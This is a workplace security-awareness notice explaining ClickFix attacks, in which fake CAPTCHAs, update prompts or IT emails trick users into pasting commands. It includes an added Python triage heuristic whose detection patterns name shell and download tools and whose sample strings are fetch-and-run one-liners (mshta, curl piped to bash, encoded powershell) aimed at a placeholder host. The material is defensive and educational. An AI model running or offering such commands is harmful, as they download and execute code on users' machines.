Cyber attackers are constantly finding new ways to bypass our defences. We all need to be on high alert for a fast-spreading tactic called a ClickFix attack. This method is highly deceptive because it tricks you into doing the work for the hackers, and it is now arriving in our email inboxes as well as on the web.
You might be browsing the web when a realistic error message pops up, or you might receive an urgent email with specific technical instructions. These attacks often disguise themselves as:
A fake CAPTCHA test to prove you are human.
A warning that your browser needs an emergency update.
A fake video call microphone or camera error.
An email pretending to be from IT support asking you to run a quick system fix or some other urgent software update or security requirement.
Whether on a webpage or in an email, the attackers will provide a string of text for you to copy. They will then give you step-by-step instructions to:
Press the Windows Key + R (to open the Run box or CMD on Windows) or open a Terminal on Mac or Linux.
Paste the copied text (usually a malicious command designed to look innocent or overly complex to hide its true intent).
Press Enter.
By running this command, you are essentially "downloading" and running the malicious software yourself.
Sometimes a web page will automatically "copy" the command to your clipboard, so all it requires is that you paste it into the Run box, Command Prompt or Terminal window to execute it.
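For the security team that receives these reports, here is an added example (not part of the original notice) of a triage heuristic for text a user was told to paste. The tool list, patterns, scoring threshold and sample strings are assumptions constructed for illustration.

```python
import re

# Assumed, non-exhaustive list of programs that can fetch or run code from a one-liner.
TOOLS = re.compile(
    r"(?<![\w.-])(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|"
    r"curl|wget|bash|sh|zsh|osascript)(?:\.exe)?(?![\w-])", re.I)
URL = re.compile(r"(?:https?|ftp)://[^\s\"'|)]+", re.I)
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:bash|sh|zsh|iex|invoke-expression)\b", re.I)
OPAQUE = re.compile(r"[A-Za-z0-9+/=]{40,}")  # long encoded-looking argument
TRAILING_COMMENT = re.compile(r"(?:#|&\s*rem\b)(.*)$", re.I)
LURE = re.compile(r"captcha|not a robot|verif|human", re.I)

def triage(text):
    """Return the reasons a pasted command should be escalated (empty list = none)."""
    reasons = []
    tools = sorted({m.group(1).lower() for m in TOOLS.finditer(text)})
    if tools:
        reasons.append("runs: " + ", ".join(tools))
    if URL.search(text):
        reasons.append("fetches from a URL")
    if PIPE_TO_SHELL.search(text):
        reasons.append("pipes output into an interpreter")
    if OPAQUE.search(text):
        reasons.append("contains a long encoded-looking argument")
    # The only part a user reads may be a trailing comment worded like the lure.
    comment = TRAILING_COMMENT.search(text)
    if comment and LURE.search(comment.group(1)):
        reasons.append("ends in a comment worded like a verification prompt")
    return reasons

def verdict(text):
    """Two or more independent signals -> block; one -> review; none -> allow."""
    count = len(triage(text))
    return "block" if count >= 2 else "review" if count else "allow"

# Constructed samples: placeholder domain, non-functional payloads.
S_WIN = "mshta https://example.invalid/verify # I am not a robot - Verification ID 4821"
S_NIX = "curl -s https://example.invalid/update.sh | bash"
S_ENC = "powershell -enc " + "QUJD" * 12
S_OK = "control printers"

if __name__ == "__main__":
    for sample in (S_WIN, S_NIX, S_ENC, S_OK):
        print(verdict(sample), triage(sample))
```
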
The most important takeaway is this: Any email, website, or pop-up that asks you to open the Run box, CMD, or a Mac or Linux terminal and paste or type a command is malicious.
Never run system commands from the web or emails: Legitimate services will never ask you to use your command prompt to fix an issue.
Always verify with Security: Never paste or type commands into these windows unless you have explicitly checked with our IT security team first.
Do not panic: These messages are designed to rush you. Close your browser tab or report the email immediately without interacting with the instructions.
Staying vigilant and Politely Paranoid is our best defence.